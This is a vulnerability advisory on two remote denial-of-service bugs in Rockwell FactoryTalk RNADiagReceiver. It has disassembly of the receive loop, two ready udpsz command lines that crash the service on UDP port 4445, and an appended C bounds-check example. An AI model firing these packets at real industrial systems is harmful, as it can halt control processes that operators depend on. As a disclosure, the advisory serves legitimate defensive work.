#######################################################################

                             Luigi Auriemma

Application:  FactoryTalk RNADiagReceiver
              http://www.rockwellautomation.com/rockwellsoftware/factorytalk/
Versions:     RNADiagReceiver <= 2.40.0.12
Platforms:    Windows
Bugs:         A] RNADiagReceiver UDP silent Denial of Service
              B] RNADiagReceiver invalid memory access
Exploitation: remote
Date:         17 Jan 2012 (found 30 Sep 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"With RSLogix 5000 programming software, you need only one software
package for discrete, process, batch, motion, safety and drive-based
application."

RNADiagReceiver is a diagnostic component available in various Rockwell
products.

#######################################################################

=======
2) Bugs
=======

-----------------------------------------------
A] RNADiagReceiver UDP silent Denial of Service
-----------------------------------------------

The code of RNADiagReceiver that handles the UDP packets terminates when
recvfrom() returns a value less than zero. Since the receive buffer is
2000 bytes, a packet bigger than 2000 bytes makes recvfrom() fail and
stops the handling of these packets:

00402CCC  |. 50               |PUSH EAX                                 ; /pFromLen
00402CCD  |. 8D45 00          |LEA EAX,DWORD PTR SS:[EBP]               ; |
00402CD0  |. 50               |PUSH EAX                                 ; |pFrom
00402CD1  |. 57               |PUSH EDI                                 ; |Flags
00402CD2  |. 68 D0070000      |PUSH 7D0                                 ; |BufSize = 7D0 (2000.)
00402CD7  |. 8DB3 84000000    |LEA ESI,DWORD PTR DS:[EBX+84]            ; |
00402CDD  |. 56               |PUSH ESI                                 ; |Buffer
00402CDE  |. FFB3 80000000    |PUSH DWORD PTR DS:[EBX+80]               ; |Socket
00402CE4  |. C745 DC 10000000 |MOV DWORD PTR SS:[EBP-24],10             ; |
00402CEB  |. FF15 80324300    |CALL DWORD PTR DS:[<&WS2_32.#17>]        ; \recvfrom
00402CF1  |. 83F8 01          |CMP EAX,1
00402CF4  |. 8945 EC          |MOV DWORD PTR SS:[EBP-14],EAX
00402CF7  |.^0F8D DBFDFFFF    \JGE RNADiagR.00402AD8
00402CFD  |. FF15 64324300    CALL DWORD PTR DS:[<&WS2_32.#111>]        ; [WSAGetLastError
00402D03  |. 50               PUSH EAX
00402D04  |. 68 FC344300      PUSH RNADiagR.004334FC                    ; UNICODE "Receive error"
00402D09  |. E8 E1E3FFFF      CALL RNADiagR.004010EF
00402D0E  |. 59               POP ECX
00402D0F  |. 59               POP ECX
00402D10  |> 8B4D F4          MOV ECX,DWORD PTR SS:[EBP-C]
00402D13  |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
00402D1A  |. 59               POP ECX
00402D1B  |. 5F               POP EDI
00402D1C  |. 5E               POP ESI
00402D1D  |. 5B               POP EBX
00402D1E  |. 8B8D 18020000    MOV ECX,DWORD PTR SS:[EBP+218]
00402D24  |. 33CD             XOR ECX,EBP
00402D26  |. E8 D78D0000      CALL RNADiagR.0040BB02
00402D2B  |. 81C5 1C020000    ADD EBP,21C
00402D31  |. C9               LEAVE
00402D32  \. C3               RETN

----------------------------------------
B] RNADiagReceiver invalid memory access
----------------------------------------

Each UDP packet is divided into chunks, each of which is composed of a
32-bit number and a 16-bit size. Through a big chunk size it's possible
to crash the server due to an invalid memory access during the
memcpy().

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

A] udpsz SERVER 4445 2001

B] udpsz -C "0002 0001" 0 -C "00000000 ffff" 0x34 -b a SERVER 4445 2000

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
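The bounds check missing in bug B, as an added example in C that is not part of this advisory or of Rockwell's code: it walks the 32-bit-number / 16-bit-size chunks of one datagram and rejects any chunk whose declared size exceeds the bytes still in the datagram or the destination buffer, which is the check the memcpy() in RNADiagReceiver lacks. The little-endian byte order, the fixed 6-byte chunk header and the 256-byte destination buffer are assumptions for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Assumed layout for this example: each chunk is a 32-bit little-endian
 * number followed by a 16-bit little-endian payload size, then the payload.
 * The advisory only states the field widths, not the byte order. */
#define CHUNK_HDR   6
#define MAX_PAYLOAD 256

/* Walk every chunk in one datagram of `len` bytes.
 * Returns the number of chunks copied, or -1 when a chunk header is
 * truncated or a declared size runs past the end of the datagram or past
 * the destination buffer (the case that crashes the unchecked memcpy()). */
int parse_chunks(const uint8_t *pkt, size_t len)
{
    uint8_t payload[MAX_PAYLOAD];
    size_t  off = 0;
    int     n   = 0;

    while (off + CHUNK_HDR <= len) {
        uint32_t number = (uint32_t)pkt[off]     | (uint32_t)pkt[off + 1] << 8 |
                          (uint32_t)pkt[off + 2] << 16 | (uint32_t)pkt[off + 3] << 24;
        uint16_t size   = (uint16_t)(pkt[off + 4] | pkt[off + 5] << 8);
        off += CHUNK_HDR;

        /* The missing check: an attacker-controlled 16-bit size must be
         * bounded both by what is left in the datagram and by the
         * destination buffer before it reaches memcpy(). */
        if (size > len - off || size > sizeof payload)
            return -1;

        memcpy(payload, pkt + off, size);
        off += size;
        n++;
        (void)number;   /* a real receiver would dispatch on this value */
    }

    /* Leftover bytes that cannot form a full header mean a truncated chunk. */
    return off == len ? n : -1;
}
```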